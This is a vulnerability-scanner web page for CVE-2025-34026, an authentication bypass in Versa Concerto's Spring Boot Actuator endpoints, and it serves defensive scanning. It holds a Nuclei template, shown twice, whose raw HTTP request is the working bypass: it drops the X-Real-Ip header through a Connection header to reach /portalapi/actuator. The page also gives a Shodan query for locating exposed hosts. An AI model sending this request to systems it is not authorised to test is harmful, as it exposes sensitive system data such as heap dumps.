Versa Concerto Actuator Endpoint - Authentication Bypass

CVE-2025-34026

Verified

Description

An authentication bypass vulnerability affected the Spring Boot Actuator endpoints in Versa Concerto due to improper handling of the X-Real-Ip header.Attackers could access restricted endpoints by omitting this header.The issue allowed unauthorized access to sensitive functionality, highlighting the need for proper header validation.

Severity

Critical

CVSS Score

7.5

Exploit Probability

57%

Affected Product

concerto

Published Date

May 21, 2025

Template Author

iamnoooob, rootxharsh, parthmalhotra

CVE-2025-34026.yaml

id: CVE-2025-34026

info:
  name: Versa Concerto Actuator Endpoint - Authentication Bypass
  author: iamnoooob,rootxharsh,parthmalhotra,pdresearch
  severity: critical
  description: |
    An authentication bypass vulnerability affected the Spring Boot Actuator endpoints in Versa Concerto due to improper handling of the X-Real-Ip header.Attackers could access restricted endpoints by omitting this header.The issue allowed unauthorized access to sensitive functionality, highlighting the need for proper header validation.
  impact: |
    Attackers can bypass authentication by omitting the X-Real-Ip header to access restricted Spring Boot Actuator endpoints, potentially exposing sensitive system information and functionality.
  remediation: |
    Upgrade to the latest Versa Concerto version that properly validates authentication for all Actuator endpoints regardless of header presence.
  reference:
    - https://projectdiscovery.io/blog/versa-concerto-authentication-bypass-rce/
    - https://security-portal.versa-networks.com/emailbulletins/6830f94328defa375486ff2e
    - https://www.cve.org/CVERecord?id=CVE-2025-34026
  classification:
    cve-id: CVE-2025-34026
    cwe-id: CWE-288
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
    cvss-score: 7.5
    epss-score: 0.56994
    epss-percentile: 0.98103
    cpe: cpe:2.3:a:versa-networks:concerto:*:*:*:*:*:*:*:*
  metadata:
    verified: true
    vendor: versa-networks
    product: concerto
    max-request: 1
    shodan-query: http.favicon.hash:-534530225
  tags: versa,concerto,actuator,auth-bypass,springboot,cve,cve2025,vkev,vuln,kev

http:
  - raw:
      - |
        GET /portalapi/actuator HTTP/1.1
        Host: {{Hostname}}
        Connection: X-Real-Ip

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - heapdump

      - type: word
        part: header
        words:
          - EECP-CSRF-TOKEN
# digest: 4b0a00483046022100faab8af56199bdb49f14fe48df2fe7c3ff0b577e9d5330d6dd4cf5ba2ae5fe67022100e65f41beb8229e69cedfb72f2afe3e5f3f850af02bbf1091f818f400d958ae58:922c64590222798bb761d5b6d8e72950

7.5Score

CVSS Metrics

CVSS Vector:

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N

CVE ID:

cve-2025-34026

CWE ID:

cwe-288

References

https://projectdiscovery.io/blog/versa-concerto-authentication-bypass-rce/https://security-portal.versa-networks.com/emailbulletins/6830f94328defa375486ff2e https://www.cve.org/CVERecord?id=CVE-2025-34026

Remediation Steps

Upgrade to the latest Versa Concerto version that properly validates authentication for all Actuator endpoints regardless of header presence.

Description

id: CVE-2025-34026

info:
  name: Versa Concerto Actuator Endpoint - Authentication Bypass
  author: iamnoooob,rootxharsh,parthmalhotra,pdresearch
  severity: critical
  description: |
    An authentication bypass vulnerability affected the Spring Boot Actuator endpoints in Versa Concerto due to improper handling of the X-Real-Ip header.Attackers could access restricted endpoints by omitting this header.The issue allowed unauthorized access to sensitive functionality, highlighting the need for proper header validation.
  impact: |
    Attackers can bypass authentication by omitting the X-Real-Ip header to access restricted Spring Boot Actuator endpoints, potentially exposing sensitive system information and functionality.
  remediation: |
    Upgrade to the latest Versa Concerto version that properly validates authentication for all Actuator endpoints regardless of header presence.
  reference:
    - https://projectdiscovery.io/blog/versa-concerto-authentication-bypass-rce/
    - https://security-portal.versa-networks.com/emailbulletins/6830f94328defa375486ff2e
    - https://www.cve.org/CVERecord?id=CVE-2025-34026
  classification:
    cve-id: CVE-2025-34026
    cwe-id: CWE-288
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
    cvss-score: 7.5
    epss-score: 0.56994
    epss-percentile: 0.98103
    cpe: cpe:2.3:a:versa-networks:concerto:*:*:*:*:*:*:*:*
  metadata:
    verified: true
    vendor: versa-networks
    product: concerto
    max-request: 1
    shodan-query: http.favicon.hash:-534530225
  tags: versa,concerto,actuator,auth-bypass,springboot,cve,cve2025,vkev,vuln,kev

http:
  - raw:
      - |
        GET /portalapi/actuator HTTP/1.1
        Host: {{Hostname}}
        Connection: X-Real-Ip

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - heapdump

      - type: word
        part: header
        words:
          - EECP-CSRF-TOKEN
# digest: 4b0a00483046022100faab8af56199bdb49f14fe48df2fe7c3ff0b577e9d5330d6dd4cf5ba2ae5fe67022100e65f41beb8229e69cedfb72f2afe3e5f3f850af02bbf1091f818f400d958ae58:922c64590222798bb761d5b6d8e72950

Versa Concerto Actuator Endpoint - Authentication Bypass

Description

Severity

CVSS Score

Exploit Probability

Affected Product

Published Date

Template Author

Nuclei Template

CVSS Metrics

References

Remediation Steps

Versa Concerto Actuator Endpoint - Authentication Bypass

Description

Severity

CVSS Score

Exploit Probability

Affected Product

Published Date

Template Author

Nuclei Template

CVSS Metrics

References

Remediation Steps